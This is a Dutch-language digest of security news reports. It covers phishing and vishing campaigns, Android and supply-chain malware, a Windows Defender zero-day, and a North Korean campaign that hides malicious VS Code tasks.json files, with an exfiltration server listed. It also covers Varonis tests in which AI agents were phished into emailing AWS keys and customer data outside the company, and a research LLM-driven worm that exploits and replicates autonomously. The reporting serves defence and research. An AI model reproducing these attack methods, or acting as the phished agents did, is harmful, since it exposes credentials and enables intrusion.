Van 20 tot 22 april 2026 observeerde Microsoft een phishingcampagne die diensten met het merk Anthropic imiteerde om gebruikers te targeten met lokmiddelen die gerelateerd zijn aan accounts van het Claude AI-platform. De campagne verstuurde phishing-e-mails naar doelwitten binnen meer dan 2.000 organisaties, voornamelijk in de Verenigde Staten (62%), het Verenigd Koninkrijk (18%) en India (9%). Hoewel deze campagne een breed scala aan sectoren trof, lag de focus met name op informatietechnologie (56%), andere zakelijke entiteiten (21%) en financiële diensten (8%).

De campagne gebruikte berichten met een handhavingsthema, waarin werd beweerd dat het account van de ontvanger in strijd was met het beleid voor acceptabel gebruik en onmiddellijke actie vereiste. De e-mails imiteerden Anthropic’s populaire AI-dienst Claude met de weergavenamen 'Anthropic Teams' en 'Anthropic PBC', vermomd als legitieme communicatie over accounts. Onderwerpregels volgden een consistente structuur van "Claude Appeal Request" gecombineerd met datelementen. De e-mailtekst werd geleverd als HTML en bevatte Anthropic en Claude branding. De boodschap informeerde ontvangers dat hun account het gebruiksbeleid voor accounts (AUP) schond en dat Anthropic "een beroepsprocedure had gestart".

Bron: Microsoft

Cybersecurityonderzoekers hebben details bekendgemaakt van een financieel gemotiveerde campagne voor data-afpersing die tussen januari en mei 2026 tientallen organisaties in professionele, juridische en financiële dienstverlening in de Verenigde Staten heeft getroffen. De activiteit is door Google Mandiant en Google Threat Intelligence Group (GTIG) toegeschreven aan de dreigingsactor UNC3753, ook bekend als Chatty Spider, Luna Moth en Silent Ransom Group (SRG).

Onderzoekers Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer en Tyler McLellansaid legden uit dat UNC3753 gebruikmaakt van voice phishing (vishing) en social engineering technieken om toegang op afstand te verkrijgen tot bedrijfsomgevingen. De dreigingsactoren gebruiken voorwendsels zoals datamigratie of e-mails met een factuurthema. Ze initiëren telefoongesprekken waarbij ze zich voordoen als IT-ondersteuning en overtuigen slachtoffers om sessies voor schermdeling te starten en hulpprogramma's voor remote monitoring en management (RMM) te downloaden.

Eenmaal binnen voeren de dreigingsactoren directe zoekopdrachten uit om bestanden van belang te lokaliseren en te exfiltreren, of ze misleiden het slachtoffer om deze acties namens hen uit te voeren. Gesteelde informatie omvat bedrijfseigen juridische overeenkomsten, persoonlijk identificeerbare informatie (PII) en financiële gegevens.

In sommige gevallen hebben de aanvallers fysiek toegang verkregen tot de systemen van slachtoffers, wat overeenkomt met een waarschuwing die de Amerikaanse Federal Bureau of Investigation (FBI) vorige maand uitgaf. Deze fysieke inbraken omvatten dreigingsactoren die zich voordoen als IT-technici om bedrijfskantoren binnen te gaan en te proberen gegevens te stelen met behulp van verwijderbare USB-media. De FBI merkte op dat UNC3753-actoren, door iemand persoonlijk naar de locatie van het slachtoffer te sturen om de inbraak te vergemakkelijken, gegevens exfiltreren naar een externe harde schijf of USB-station dat door de dreigingsactor in de computer van het slachtoffer wordt geplaatst.

Google stelt dat UNC3753 tactische overeenkomsten vertoont met UNC2686, een dreigingscluster dat eerder bekend stond om BazarCall-achtige campagnes in 2021. Hoewel de groep in het verleden LockBit Black ransomware heeft ingezet, richt zij zich sinds 2022 voornamelijk op afpersingsoperaties, waarbij slachtoffers onder druk worden gezet om te betalen of het risico lopen dat hun gegevens worden gepubliceerd op de LEAKEDDATA-website voor gegevenslekken. Zowel UNC3753 als UNC2686 worden beschouwd als uitlopers van de inmiddels opgeheven Conti ransomware groep. Eerdere campagnes gebruikten lokmiddelen voor abonnement-annulering als onderdeel van callback-phishingaanvallen om software voor toegang op afstand op de machines van slachtoffers te installeren.

Vanaf ongeveer maart 2025 heeft de hackgroep zich voorgedaan als medewerkers van de interne IT-helpdesk van bedrijven om slachtoffers te verleiden deel te nemen aan een sessie voor schermdeling op platforms voor bedrijfscommunicatie zoals Zoom, Microsoft Teams of Quick Assist. Dit gebeurde onder het mom van het aanpakken van een beveiligingsprobleem of het helpen met een project voor bedrijfseigen datamigratie, waardoor traditionele beveiligingscontroles effectief werden omzeild.

Google merkte op dat de dreigingsgroep vaak campagnes start met onschuldige e-mails met een factuurthema, verzonden vanuit consumenten e-mailaccounts die door de actor worden beheerd. Deze berichten bevatten geen actieve links of kwaadaardige bijlagen, maar meestal een korte, algemene boodschap. Het primaire doel van deze e-mails is het opzetten van een voorwendsel, waardoor de interne beveiligingsbezwaren van het doelwit worden vergroot, zodat ze ontvankelijker zijn voor daaropvolgende telefoongesprekken.

Zodra een sessie is opgezet, proberen de aanvallers een aanhoudende toegang te creëren door de slachtoffers te begeleiden bij het installeren van legitieme remote desktop software zoals AnyDesk, Bomgar, SuperOps RMM of Zoho Assist. Instructies voor het installeren van deze programma's worden gedeeld via een legitieme dienst genaamd "privnote[.]com", waarmee gebruikers notities kunnen verzenden die zichzelf vernietigen nadat ze door de ontvanger zijn gelezen.

UNC3753 is ook waargenomen bij het direct opzetten van Zoom-sessies op persoonlijke laptops van doelwitten om toegang te krijgen tot corporate virtual desktop infrastructure (VDI) en dieper door te dringen in bedrijfsbestandssystemen. Het doel is het inventariseren van lokale en cloud-directories, het doorzoeken van gekoppelde netwerkshares en het verzamelen van gegevens uit zeer gevoelige mappen, waaronder die gerelateerd zijn aan belastingaangiften, audits, klantovereenkomsten en Social Security numbers (SSN's).

In de laatste fase worden de buitgemaakte gegevens via WinSCP of Rclone naar de dreigingsactoren verzonden, of naar e-mailadressen die door de dreigingsactor worden beheerd vanuit de mailbox van het doelwit. Dit wordt gevolgd door het verzenden van een afpersingsbericht in de vorm van een e-mail, meestal binnen 30 minuten na het verlaten van de omgeving van het doelwit. De e-mailberichten geven slachtoffers een deadline van drie dagen om onderhandelingen over losgeld te starten. Ze dreigen ook direct medewerkers en externe cliënten te bellen en te e-mailen om hen op de hoogte te stellen van het gegevenslek als ze niet reageren, naast het publiceren van alle gestolen informatie op de website voor gegevenslekken.

In veel incidenten die zijn onderzocht door de teams voor dreigingsinformatie en incidentrespons van Google, vond de end-to-end operatie, van het eerste contact tot de data-afpersing, plaats binnen één werkdag. Het snelle operationele model wordt geïllustreerd door het feit dat de aanvallers binnen een uur beginnen met het zoeken naar gegevens, het voorbereiden en het stelen ervan.

Google benadrukt dat juridische dienstverleners waardevolle doelwitten vertegenwoordigen voor afpersingsactoren. Zij bewaren geconcentreerde opslagplaatsen van extreem gevoelige cliënttransactiebestanden, fusie- en overnameplannen, handelsgeheimen van cliënten en bedrijfsrapporten aan regelgevende instanties. Dreigingsgroepen erkennen dat juridische entiteiten onderhevig zijn aan aanzienlijke reputatie- en regelgevingsrisico's en zeer gemotiveerd kunnen zijn om afpersingssituaties stilzwijgend op te lossen om hun professionele status te beschermen. De dreigingsactoren erkennen dat het richten op het menselijke element, specifiek door middel van stemgestuurde social engineering, wat hen in staat stelt om robuuste technische perimeters, webbeveiligingsgateways en multi-factor authenticatie (MFA) configuraties gemakkelijk te omzeilen.

Bron: Google Mandiant | Bron 2: resecurity.com

Op 03 juni 2026 heeft AI-bedrijf Anthropic een analyse gepubliceerd over het misbruik van kunstmatige intelligentie bij cyberaanvallen. Het onderzoek beslaat de periode van maart 2025 tot maart 2026 en is gebaseerd op de monitoring van 832 accounts die door Anthropic werden verbannen wegens beleidsschendingen.

Uit de analyse blijkt een aanzienlijke toename van risicovolle activiteiten. Het percentage aanvallers dat werd ingeschaald als medium- of hoog risico steeg van 33 procent in de eerste helft van de onderzochte periode naar 56 procent in de tweede helft. Meer dan twee derde van de verbannen accounts, specifiek 560 van de 832, maakte gebruik van AI-technologieën voor hackactiviteiten en het ontwikkelen van malware.

Anthropic documenteerde concrete voorbeelden van escalatie. Zo werden afpersingsoperaties uitgevoerd met behulp van Claude Code. Een ander opvallend geval betrof een grotendeels zelfstandig opererende spionagecampagne. Deze campagne, toegeschreven aan een staatsgesteunde Chinese groep, richtte zich op ongeveer dertig doelwitten wereldwijd. De kernconclusie van Anthropic is dat AI geavanceerde cyberaanvallen toegankelijker maakt, zelfs voor aanvallers met beperkte technische kennis.

Bron: Anthropic

Onderzoekers van beveiligingsbedrijf Zimperium hebben een nieuwe vorm van malware voor Android gedetailleerd die bekendstaat als DroidLock. Deze dreiging presenteert zich als ransomware door het apparaatscherm te vergrendelen en losgeld te eisen, maar versleutelt in werkelijkheid geen bestanden. In plaats daarvan legt DroidLock een schermvullende boodschap over het toestel, waarin staat dat het apparaat is gehackt of vergrendeld, en eist vervolgens een ontgrendelcode in ruil voor een losgeldbetaling. In campagnes die in Vietnam werden waargenomen, varieerden de geëiste bedragen tussen ongeveer vijf en achttien euro.

Onder deze misleidende laag functioneert DroidLock als een krachtig schadelijk programma. Het misbruikt toegekende beheerrechten om diverse schadelijke acties uit te voeren, waaronder het wijzigen van de pincode van het apparaat, het op afstand wissen van het gehele toestel, het maken van schermafbeeldingen en het opnemen van video via de camera van het apparaat. Bovendien stelt de malware aanvallers in staat om volledige controle op afstand over het gecompromitteerde Android-toestel over te nemen.

De primaire verspreidingsmethode van DroidLock omvat phishingsites die nep-applicaties hosten. Deze bedrieglijke apps doen zich voor als legitieme systeemupdates of antivirusprogramma's. Na installatie plaatst een afzonderlijke installatie-app vervolgens de daadwerkelijke DroidLock-malware op het apparaat van de gebruiker. Gebruikers die hun apparaten geïnfecteerd vinden, kunnen de malware doorgaans verwijderen door hun telefoon opnieuw op te starten in de veilige modus. De eerste campagnes van DroidLock richtten zich op Spaanstalige gebruikers, en sindsdien is de malware ook waargenomen in Vietnam.

Bron: Zimperium

Aanvallers maken aanhoudend misbruik van een eerder ontdekt beveiligingslek in het populaire archiveringsprogramma WinRAR. Antivirusbedrijf Trend Micro meldt dat de kwetsbaarheid, bekend als CVE-2025-8088, nog altijd wordt ingezet omdat organisaties moeite hebben met het uitrollen van de benodigde patches. Het betreft een path traversal lek dat aanvallers in staat stelt bestanden naar willekeurige mappen te schrijven, mits het doelwit een speciaal geprepareerd bestand opent.

De aanvalsmethode is sluw, want terwijl de gebruiker bijvoorbeeld een onschuldig pdf-document ziet, wordt op de achtergrond een kwaadaardig bestand in de Windows Startup map geplaatst. Dit bestand wordt vervolgens automatisch uitgevoerd wanneer de gebruiker opnieuw inlogt, wat resulteert in een besmetting van het systeem met malware.

Het probleem werd reeds op 24 juli vorig jaar verholpen met de bètaversie van WinRAR 7.13. De definitieve versie van WinRAR 7.13 volgde op 30 juli. Opvallend is dat aanvallers al misbruik maakten van het lek voordat deze updates beschikbaar waren. Google rapporteerde begin dit jaar al grootschalig misbruik van de WinRAR-kwetsbaarheid door verschillende aanvallende groepen. Een half jaar later blijft de kwetsbaarheid actief in gebruik bij aanvallen, zo constateert Trend Micro.

De persistentie van het misbruik is te wijten aan het feit dat WinRAR op veel endpoints niet gepatcht is. Trend Micro legt uit dat WinRAR geen automatische updatefunctie heeft, geen ondersteuning biedt voor Group Policy en buiten gangbare zakelijke patchsystemen zoals WSUS, SCCM of Intune valt. Dit maakt het controleren van de patchstatus op honderden endpoints een complex proces dat handmatige controles of de inzet van third-party tools vereist. Volgens Trend Micro creëren softwareproducten met dergelijke eigenschappen een "permanente blinde vlek" in het vulnerability management van organisaties, waardoor ze lang na het verschijnen van patches kwetsbaar blijven.

Bron: Trend Micro | Bron 2: nvd.nist.gov | Bron 3: app.opencve.io

Een beveiligingsonderzoeker, bekend onder de pseudoniemen Nightmare Eclipse, Chaotic Eclipse en Dead Eclipse, heeft publiekelijk een nieuwe proof-of-concept (PoC) exploit vrijgegeven. Deze exploit, genaamd RoguePlanet, richt zich op een voorheen onbekende race condition kwetsbaarheid in Microsoft Windows Defender. De succesvolle uitvoering van RoguePlanet resulteert in een command shell die draait met SYSTEM-niveau privileges, waardoor een aanvaller de hoogst mogelijke toegang tot het systeem verkrijgt.

Windows Defender is een essentieel en integraal onderdeel van het Windows-besturingssysteem, dat standaard dient als antivirus- en antimalwaresoftware voor miljoenen gebruikers wereldwijd, inclusief in Nederland en België. De ontdekking van een 0-day kwetsbaarheid in een dergelijk cruciaal beveiligingscomponent is dan ook zeer zorgwekkend. Een 0-day exploit verwijst naar een kwetsbaarheid waarvoor de softwareleverancier (in dit geval Microsoft) nog geen patch heeft uitgebracht, of zelfs nog niet van op de hoogte is. Dit betekent dat er geen officiële verdediging beschikbaar is totdat een update wordt uitgebracht.

De kwetsbaarheid in kwestie is een race condition. Dit type kwetsbaarheid ontstaat wanneer een systeem afhankelijk is van een specifieke volgorde of timing van gebeurtenissen, en een aanvaller erin slaagt om die volgorde te manipuleren of te verstoren. Door de timing van interne processen binnen Windows Defender te exploiteren, heeft de onderzoeker een manier gevonden om het beveiligingsmechanisme te omzeilen.

Het meest kritieke aspect van de RoguePlanet-exploit is de uitkomst, namelijk de creatie van een command shell met SYSTEM-niveau privileges. In het Windows-besturingssysteem vertegenwoordigt SYSTEM de hoogste autoriteit, vergelijkbaar met 'root' op Unix-achtige systemen. Met SYSTEM-rechten kan een aanvaller vrijwel elke denkbare actie uitvoeren op het getroffen systeem. Dit omvat, maar is niet beperkt tot, het installeren van persistente malware die moeilijk te detecteren en te verwijderen is, het wijzigen van kritieke systeeminstellingen, het toegang krijgen tot en exfiltreren van gevoelige data, en het aanmaken van nieuwe gebruikersaccounts met volledige administratieve controle. Een dergelijke compromittering kan leiden tot volledige overname van het systeem en verdere laterale beweging binnen een netwerk.

De publieke vrijgave van een proof-of-concept exploit voor een 0-day kwetsbaarheid verhoogt altijd de urgentie en het risico. Kwaadwillende actoren kunnen de PoC bestuderen en aanpassen voor hun eigen aanvalscampagnes. Dit plaatst Microsoft onder aanzienlijke druk om de kwetsbaarheid snel te analyseren, een patch te ontwikkelen en deze via reguliere updates te distribueren. Tot die tijd is het voor organisaties en individuele gebruikers van cruciaal belang om extra waakzaam te zijn en de officiële communicatie van Microsoft nauwlettend te volgen voor beveiligingsupdates en aanbevelingen.

Bron: Nightmare Eclipse

Onderzoekers van Unit 42, het Threat Research Center van Palo Alto Networks, hebben een nieuwe aanvalsmethode gedetailleerd die misbruik maakt van cloud logging diensten om detectie te ontwijken en blijvende zichtbaarheid in gecompromitteerde omgevingen te verkrijgen. Deze logging diensten, zoals AWS CloudTrail en Google Cloud, zijn essentieel voor beveiligingsmonitoring omdat ze uitgebreid inzicht bieden in alle acties die binnen cloudbronnen worden uitgevoerd. Juist deze cruciale rol maakt ze tot een waardevol doelwit voor aanvallers.

Volgens onderzoeker Yahav Festinger zijn de aanvalstechnieken tegen cloud logging diensten primair onder te verdelen in twee categorieën. De eerste is "Defense Evasion", waarbij aanvallers proberen detectiesystemen te omzeilen om onopgemerkt aanvallen uit te voeren. Dit kan inhouden dat ze middelen binnen de cloud logging dienst zelf aanpassen om de stroom van logs te verstoren, waardoor beveiligingsteams 'verblind' worden.

De tweede categorie betreft "Continuous Visibility", waarbij aanvallers proberen logs over te hevelen naar hun eigen accounts. Door dit te doen, kunnen zij een constante stroom van informatie over de omgeving van het slachtoffer verkrijgen, wat hen blijvende zichtbaarheid en controle geeft over de activiteiten binnen de cloudinfrastructuur. Diensten zoals AWS CloudTrail, Google Cloud en S3 (voor logopslag) zijn krachtige tools voor verdedigers, maar tegelijkertijd primaire doelwitten voor aanvallers die onopgemerkt willen blijven.

Het begrijpen van deze aanvalsscenario's is cruciaal voor organisaties om de juiste configuraties te implementeren en misbruik van diensten te detecteren. Het onderzoek benadrukt de noodzaak voor organisaties om hun cloud logging diensten zorgvuldig te beveiligen en te monitoren op onregelmatigheden die kunnen duiden op een compromis.

Bron: Unit 42 | Bron 2: mastodon.social | Bron 3: paloaltonetworks.com

Onderzoek van beveiligingsfirma Varonis heeft aangetoond dat OpenClaw AI-agenten, die zijn ontworpen om autonoom te interacteren met real-world systemen, vatbaar zijn voor veelvoorkomende phishing-tactieken die traditioneel worden gebruikt om menselijke gebruikers te compromitteren. Het OpenClaw open-source AI-agent framework stelt grote taalmodellen (LLM's) in staat om zelfstandig acties uit te voeren, zoals het verwerken van e-mails.

Varonis-onderzoekers creëerden een OpenClaw-agent, genaamd Pinchy, en koppelden deze aan een Gmail-inbox, browsertools, Google Workspace API's en gesimuleerde interne bedrijfsgegevens. Deze gegevens omvatten gevoelige informatie zoals AWS- en databasegegevens, CRM-exports, interne communicatie en kalenderuitnodigingen. De agent werd geconfigureerd in twee standen, een generieke met standaard productiviteitsinstructies en een strikte modus met specifieke instructies voor phishing-bewustzijn en identiteitsverificatie. De tests werden uitgevoerd met Google Gemini 3.1 Pro en OpenAI GPT-5.4.

"Varonis Threat Labs onderzocht of dezelfde phishing-technieken die mensen al tientallen jaren voor de gek houden, ook zouden werken op de AI-agenten die namens hen werken," aldus het rapport van Varonis.

De onderzoekers voerden vier gesimuleerde phishing aanvallen uit, met uiteenlopende resultaten. In één scenario imiteerde een aanvaller een teamleider en vroeg toegang tot de staging-omgeving vanwege een vermeend productieprobleem. De AI-agent lokaliseerde en verstuurde AWS IAM-sleutels, databasegegevens en SSH-toegangsdetails naar een extern Gmail account. De strikte modus faalde in dit geval, omdat het verzoek als operationeel urgent werd ervaren.

Een vergelijkbaar resultaat werd behaald toen de aanvaller om een klantenexport vroeg voor een presentatie. De agent haalde een CRM-export op met klantgegevens, contactinformatie, contractdetails en omzetgegevens, en verstuurde deze zonder de identiteit van de afzender te verifiëren. Ook hier faalde de strikte modus vanwege het ontbreken van afzenderverificatie.

Bij een nep-cadeaubon-e-mail met een phishing-link bezocht de agent in de generieke configuratie de phishing-site en probeerde de cadeaubon in te wisselen met gefabriceerde gegevens, voordat de pagina uiteindelijk als kwaadaardig werd geïdentificeerd. De strikte configuratie blokkeerde deze aanval echter onmiddellijk. Een vierde test met een kwaadaardige Google OAuth-applicatie, vermomd als een tijdsregistratieplatform, liet zien dat de agent de OAuth-stroom inspecteerde, de bestemming analyseerde en de applicatie als verdacht identificeerde, waarna toegang werd geweigerd.

De conclusie van Varonis is dat AI-agenten goed zijn in het detecteren van verdachte URL's, het identificeren van nep-inlogpagina's, het herkennen van kwaadaardige OAuth-apps en het spotten van phishing-indicatoren. Ze kunnen echter nog steeds falen door een gebrek aan identiteitsverificatie, verlies van context en het onvermogen om "zero trust"-principes toe te passen op sociale interacties. Op modelniveau bleek Gemini een grotere interactiebereidheid te tonen, terwijl GPT-5.4 een voorzichtiger houding had.

Varonis adviseert dat AI-agenten expliciet moeten worden verplicht om de identiteit van afzenders te verifiëren, moeten worden beperkt in het e-mailen van nieuwe externe ontvangers zonder goedkeuring, en beperkte toegang moeten hebben tot interne gegevens. Voor risicovolle acties, zoals het delen van referenties, het aanvragen van financiële gegevens en communicatie met nieuwe contacten, moet menselijke goedkeuring worden vereist.

Bron: Varonis | Bron 2: hubs.li

Microsoft heeft op 5 juni 73 repositories verwijderd van zijn Azure-, microsoft-, Azure-Samples- en MicrosoftDocs-organisaties op GitHub. Deze actie, die binnen 105 seconden werd uitgevoerd, had als doel de verstoring van continue integratiepipelines te stoppen. Het bedrijf heeft bevestigd dat de repositories werden verwijderd vanwege zorgen over de distributie van "potentieel kwaadaardige inhoud". Meerdere onderzoekers hebben bevestigd dat de repositories zijn offline gehaald na een compromittering als onderdeel van een Miasma/Shai-campagne van Hulud gericht op de toeleveringsketen.

De OpenSourceMalware-platform merkt op dat de 'durabletask'-repository binnen Microsofts Azure-organisatie op GitHub mogelijk al in mei was gecompromitteerd. Dit suggereert dat een onvolledige opschoning de dreigingsactor in staat stelde terug te keren met een nieuwe compromittering, hoewel dit niet officieel is bevestigd. Direct na de verwijdering van de repositories verscheen een bericht van GitHub Staff dat de actie was ondernomen wegens een "schending van de servicevoorwaarden van GitHub". Een vertegenwoordiger van Microsoft reageerde op gebruikersbezwaren in een gemeenschapsdiscussie en verklaarde dat de repositories waren uitgeschakeld vanwege "een intern beheerprobleem" en dat een onderzoek gaande was.

Het meest directe gevolg van dit incident was het uitschakelen van toegang tot 'Azure/functions-action', een GitHub Action die veel ontwikkelaars gebruiken voor het implementeren van Azure Functions. Workflows die hiernaar verwezen, stopten met werken, wat leidde tot storingen en verwarring. Ten tijde van de rapportage zijn alle repositories echter hersteld en worden ze als veilig beschouwd. Het OpenSourceMalware-platform heeft verder vastgesteld dat het 'durabletask'-pakket op de Python Package Index (PyPI) in mei al was gecompromitteerd, toen de dreigingsactor drie kwaadaardige versies (1.4.1, 1.4.2, 1.4.3) publiceerde.

Een woordvoerder van Microsoft verklaarde dat het bedrijf "tijdelijk enkele repositories heeft verwijderd terwijl we potentieel kwaadaardige inhoud onderzochten". Hoewel alle repositories zijn hersteld, heeft Microsoft "een klein aantal klanten op de hoogte gesteld die mogelijk inhoud van de getroffen repositories hebben gedownload". Het onderzoek wordt voortgezet, en indien verdere actie van klanten nodig blijkt, zal Microsoft rechtstreeks contact opnemen via de gevestigde ondersteuningskanalen.

Beveiligingsingenieur Adnan Khan gaf aan dat het incident van 5 juni met de Microsoft-repositories deel uitmaakte van de Miasma-malwarecampagne die eerder 32 npm-pakketten van Red Hat had geïnfecteerd. Een recent rapport van Cloudsmith, een bedrijf gespecialiseerd in software supply chain management, concludeerde dat Microsofts Azure-omgeving op GitHub en de 'durabletask'-repository werden gecompromitteerd via Miasma. Deze campagne richtte zich op AI-coderingstools zoals Claude Code, Gemini CLI, VS Code en Cursor. De aanvaller wist vanuit de npm-pakketten van Red Hat door te dringen tot de Microsoft-bronnen op GitHub. De worm infecteerde de @redhat-cloud-services npm-namespace door een GitHub-account van een Red Hat-medewerker te compromitteren. Door ongecontroleerde 'orphan commits' naar interne repositories te pushen, injecteerden de dreigingsactoren een minimale workflow die GitHubs OIDC-tokens opvroeg.

Supply-chain aanvallen blijven open-source ecosystemen teisteren. Onlangs rapporteerde het applicatiebeveiligingsbedrijf Socket een nieuwe Shai-aanval met Hulud die gebruik maakte van een nieuw leveringsmechanisme. StepSecurity publiceerde ook een rapport over een Shai-aanval met Hulud die Pythagora-io/gpt-pilot trof, een populaire open-source AI-ontwikkelaarstool. Softwareontwikkelaars wordt geadviseerd om projectafhankelijkheden te vergrendelen, vertragingen in te bouwen bij het ophalen van nieuwe pakketupdates en nieuwe builds in geïsoleerde omgevingen te testen.

Bron: Microsoft | Bron 2: opensourcemalware.com | Bron 3: cloudsmith.com

Hackers die gelinkt zijn aan Noord-Korea richten zich opnieuw op de ontwikkelaarsgemeenschap, ditmaal door kwaadaardige code te verbergen in ogenschijnlijk legitieme GitHub-repositories. De campagne, aangeduid als UNK_DeadDrop, maakt gebruik van valse vacatures en verzoeken voor codereviews om ontwikkelaars te verleiden geïnfecteerde repositories te klonen en onbewust malware op hun systemen uit te voeren.

Tussen april en mei 2026 verstuurde de dreigingsactor meer dan 250 phishing-e-mails naar individuen binnen bijna 100 organisaties. Financiële instellingen, cryptocurrency-bedrijven, onderwijsinstellingen en technologiebedrijven behoorden tot de voornaamste doelwitten, waarbij de meeste getroffen organisaties gevestigd waren in de Verenigde Staten. De aanvallers gebruikten overtuigende nepbedrijfsnamen en professionele afzenderdomeinen om hun benadering legitiem te doen lijken.

Analisten van Proofpoint stelden in een rapport, gedeeld met Cyber Security News, dat de activiteit waarschijnlijk wordt uitgevoerd door een dreigingsactor die gelinkt is aan Noord-Korea, en dat deze wordt gevolgd als een afzonderlijke groep. De onderzoekers constateerden sterke overeenkomsten met een eerder bekende groep genaamd Contagious Interview, hoewel er geen directe infrastructuuroverlap werd gevonden in de telemetrie van Proofpoint.

De malware die via deze campagne wordt ingezet, is platformonafhankelijk en werkt op macOS, Linux en Windows. Het maakt gebruik van een open-source Go-framework genaamd Overlord om persistente verbindingen met een command and control server te onderhouden. De infectieketen maakt externe toegang, diefstal van inloggegevens, het leegtrekken van cryptowallets en exfiltratie van browsergegevens mogelijk.

De campagne is bijzonder gevaarlijk vanwege de manier waarop deze naadloos aansluit op de dagelijkse workflow van een ontwikkelaar. Een ontwikkelaar die een legitiem ogende technische opdracht-e-mail ontvangt, zou waarschijnlijk zonder aarzelen een repository klonen en deze in hun code-editor openen, wat precies het startpunt van de aanval is.

De aanval begint met een phishing-e-mail die verwijst naar een GitHub- of GitLab-repository die een echt codeerproject nabootst. De e-mails zien eruit als wervingsberichten voor banen of verzoeken voor codereviews van bedrijven zoals Pulsynk, Trixauvex of Ondo Finance, die allemaal nagemaakte identiteiten of volledig gefabriceerde entiteiten zijn.

Wanneer een ontwikkelaar de repository kloont en opent in Visual Studio Code of Cursor, voert een verborgen bestand genaamd `tasks.json` binnen een verborgen map genaamd `.vscode` automatisch kwaadaardige scripts uit. Op macOS en Linux installeert het script een kwaadaardige VS Code-extensie (VSIX), vermomd als een dienst van Google, en lanceert vervolgens de Overlord-backdoor. Op Windows wordt de payload volledig binnen het proces van de editor uitgevoerd, zonder dat er een binair bestand op de schijf wordt geplaatst, wat detectie bemoeilijkt. Het gebruik van de taakautomatisering van VS Code is een slimme tactiek, aangezien het gedrag volledig normaal lijkt binnen een ontwikkelaarsomgeving. Cursor voert de verborgen taak in het bijzonder zonder gebruikersaanwijzingen uit, waardoor de aanval op dat platform volledig stil verloopt.

Zodra de malware voet aan de grond heeft gekregen, richt het zich op het stelen van waardevolle informatie. Op macOS presenteert een secundair ingesloten binair bestand, genaamd `darwin-password-prompt`, een nep-systeemdialoogvenster waarin de gebruiker wordt gevraagd om zijn apparaatwachtwoord. Nadat het wachtwoord is verzameld en gevalideerd, wijzigt de malware de toegang tot browser sleutelhangers en dumpt het inloggegevens van Chrome, Brave, Edge, Opera en verschillende andere browsers. Op Linux gebruikt de malware een native hulpmiddel voor systeemdialogen, genaamd Zenity, om een vergelijkbare nep-prompt te maken en richt het zich op GNOME Keyring-inloggegevens met behulp van Python-scripts. Op Windows volgt het een meer technische route, inclusief het omzeilen van App-Bound Encryption in Chromium-browsers en het extraheren van inloggegevens met behulp van DPAPI. De Windows-variant richt zich op 35 extensies voor cryptowallets, 18 zelfstandige wallet-applicaties en browsercookies.

Alle verzamelde gegevens, waaronder wallet-inhoud, Safe Storage-sleutels, login-gegevens en browsercookies, worden verpakt in een ZIP-bestand en geüpload naar de door de aanvaller gecontroleerde server op `23.137.105[.]75:5173`. Ontwikkelaars die cryptocurrency-accounts met hoge waarde beheren of werkzaam zijn binnen de DeFi- en blockchain-sector lopen het grootste risico.

Beveiligingsteams wordt geadviseerd om alle repositories gericht op ontwikkelaars te controleren op verborgen `.vscode`-mappen en onverwachte `tasks.json`-bestanden voordat ze deze in een IDE openen. Organisaties dienen ook de instellingen voor automatische taakuitvoering van VS Code te beperken en uitgaande verbindingen te monitoren op ongebruikelijk verkeer naar onbekende WebSocket-eindpunten.

Indicatoren van Compromis (IoC's):

- `23.137.105[.]75:5173`

Bron: Proofpoint

Onderzoekers van de Universiteit van Toronto hebben een proof of concept ontwikkeld en getest van een door AI gestuurde computerworm. Deze worm maakt gebruik van een lokaal gehost grootschalig taalmodel (LLM) met open gewichten om door een netwerk te navigeren, op maat gemaakte aanvalsstrategieën te genereren voor elk doelwit dat het tegenkomt, en zichzelf te repliceren. Dit alles gebeurt zonder menselijke tussenkomst en zonder gebruik te maken van commerciële AI-diensten.

De preprint, die op 2 juni op arXiv is geplaatst en momenteel peer review ondergaat, benadrukt waarom het patchen van individuele kwetsbaarheden (CVE's) tekortschiet wanneer malware in staat is blootgestelde diensten te inspecteren, recente adviezen te lezen en een nieuw aanvalspad te genereren tijdens runtime.

In vijftien geïsoleerde tests op een opzettelijk kwetsbaar netwerk met 33 hosts, identificeerde de worm gemiddeld 31,3 kwetsbaarheden en verkreeg het verhoogde toegang op 23,1 hosts. Dit komt neer op ongeveer driekwart van de actief getargete hosts. Vervolgens repliceerde de worm zich autonoom naar 20,4 van deze hosts, wat neerkomt op 62% van het volledige netwerk, over een periode van zeven dagen. Dit gebeurde zonder enige voorkennis van de netwerktopologie en zonder menselijke input.

Traditionele wormen worden geleverd met een vaste exploit payload die tijdens de bouw wordt gekozen. Door deze specifieke bugs te patchen, stopt de verspreiding van de worm. Deze nieuwe worm werkt anders, het gebruikt een LLM met open gewichten, draaiend op een enkele GPU, om tijdens runtime aanvalslogica te genereren. Deze logica is afgestemd op wat de worm op het volgende doelwit aantreft. Er is geen vooraf gecodeerde exploitketen en geen afhankelijkheid van API's van diensten zoals OpenAI of Anthropic, die door een platform kunnen worden ingetrokken of beperkt.

Het team van het CleverHans Lab, geleid door universitair hoofddocent Nicolas Papernot, omvat medewerkers van de Universiteit van Toronto, het Vector Institute, de Universiteit van Cambridge en ServiceNow. Zij voerden vijftien onafhankelijke experimenten uit op een geïsoleerd netwerk van 33 hosts ("FakeCorp"). Dit netwerk omvatte systemen met Ubuntu, Debian, Rocky Linux, Alpine, Windows Server 2008 R2, 2019 en 2022, evenals IoT apparaten. Elke host bevatte ten minste één realistische kwetsbaarheid. Vijf van de 33 machines waren uitgerust met GPU's. In de belangrijkste propagatie-experimenten gebruikte de worm een gedeelde inferentiepool van GPU's om rekenkracht te simuleren die van slachtoffermachines was verkregen. Het team testte ook afzonderlijk volledige replicatie op GPU-niveau, waarbij de worm een lokale LLM-instantie installeert op een gecompromitteerde GPU-host; dit slaagde in 68,8% van de pogingen.

In het gelaagde ontwerp fungeren geïnfecteerde GPU-compatibele hosts als gedistribueerde redeneerknooppunten die inferentie leveren voor apparaten met minder rekenkracht in het netwerk die het model zelf niet kunnen draaien. Gedurende de vijftien runs verkreeg de worm verhoogde toegang op 23,1 hosts en lanceerde succesvol een replica op 88% daarvan. De worm bereikte tot zeven generaties van zelfreplicatie, met een gemiddelde van 5,1. De opstelling was opzettelijk kwetsbaar om autonome redenering te meten over realistische individuele zwakke punten, en niet de verspreiding door een gehard productienetwerk onder actieve endpointbeveiliging.

